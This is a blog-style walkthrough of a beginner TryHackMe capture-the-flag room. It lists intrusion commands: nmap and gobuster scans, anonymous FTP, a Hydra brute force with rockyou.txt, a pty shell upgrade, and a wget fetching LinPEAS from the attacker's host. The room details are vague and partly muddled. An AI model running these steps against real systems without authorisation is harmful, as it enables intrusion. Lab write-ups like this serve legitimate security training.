Retro Room TryHackMe: A Comprehensive Walkthrough

by Admin
retro room tryhackme

The Retro Room on TryHackMe is a beginner-friendly room themed around the retro age of computers combining nostalgia with engaging learning experiences. The aim is to teach fundamental concepts in cyber security through gamified problem solving making it suitable for those who are starting to learn penetration testing.

The challenges focus on enumeration exploitation and basic Linux commands. For those unfamiliar with retro room tryhackme, it’s an online platform that offers a wide range of cyber security focused learning labs often through hands-on exercises.

Initial Enumeration

The first step in any penetration testing task is enumeration. In the Retro Room start by deploying the machine and then find its IP address. Enumeration is crucial as it provides insights into open ports services and possible vulnerabilities that can be exploited.

To begin:

  • Use Nmap to scan the IP address assigned to the Retro Room.nmap -sV -A [IP_ADDRESS]

nmap -sV -A [IP_ADDRESS]

  • The results will show the open ports and services running on the machine. In most cases the Retro Room has an open HTTP service on port 80 and possibly an FTP service as well. Enumerating these services is key to understanding how to proceed.

The HTTP service often leads to a web page that’s styled in a retro theme possibly containing clues that will guide you further. Always take note of any suspicious directories or files mentioned.

Exploring the Web Server

Once you have identified the open ports visit the web page hosted on the HTTP server. You might encounter a simple retro-themed website with hints hidden within the HTML code. Inspect the page elements using your browser’s Developer Tools (usually accessed by right-clicking on the page and selecting “Inspect”).

Often, there are comments in the HTML source code that could point you towards directories or even credentials. Use Gobuster to automate the directory enumeration process.

gobuster dir -u http://[IP_ADDRESS] -w /usr/share/wordlists/dirb/common.txt

This command will help uncover hidden directories and files which could include configuration files or scripts that may have sensitive information.

FTP Access and Credentials

The FTP server may allow anonymous login which is an interesting entry point for attackers. To check if anonymous access is permitted, use the following command:

ftp [IP_ADDRESS]

If anonymous access is enabled you will be able to log in without a password. Once inside look for any files that may contain useful information such as potential usernames or passwords for the web server.

Gaining Access

Once a vulnerability is identified you can exploit it to gain access to the machine. For instance, if there’s a Remote Code Execution (RCE) vulnerability in the web server you can use tools like Metasploit to get a shell.

Another common method is to exploit a weak password. If you found usernames in the FTP service try using basic password lists to gain access. A popular tool for this is Hydra:

hydra -l [username] -P /usr/share/wordlists/rockyou.txt ftp://[IP_ADDRESS]

Once you gain shell access it’s essential to stabilize your shell. You can do this by spawning a TTY shell:

python3 -c ‘import pty; pty.spawn(“/bin/bash”)

Privilege Escalation

The next step is privilege escalation. Enumeration scripts like LinPEAS are very helpful in identifying potential paths to escalate privileges:

Upload LinPEAS to the target machine:

python3 -m http.server 8080 # On your local machine wget http://[YOUR_LOCAL_IP]:8080/linpeas.sh # On the target machine

Run LinPEAS to identify any misconfigurations or exploitable services.

    In many cases outdated kernel versions or poorly configured sudo permissions provide an opportunity for privilege escalation. Look for users with NOPASSWD entries in the sudoers file or any scripts that are run as root but writable by your current user.

    Capturing the Flag

    Once you gain root privileges, navigate through the file system to find the flag.txt file which is typically located in the root or home directory.

    cat /root/flag.txt

    Congratulations you have successfully completed the Retro Room challenge!

    Conclusion

    The Retro Room TryHackMe is an excellent starting point for beginners who want to develop their skills in penetration testing. It offers a fun retro-themed experience while teaching critical skills such as enumeration exploiting vulnerabilities and privilege escalation. As with any cyber security task remember the importance of methodical enumeration and keeping an open mind while approaching each challenge.

    Read Also: Civitai Buzz Codes

    Related Posts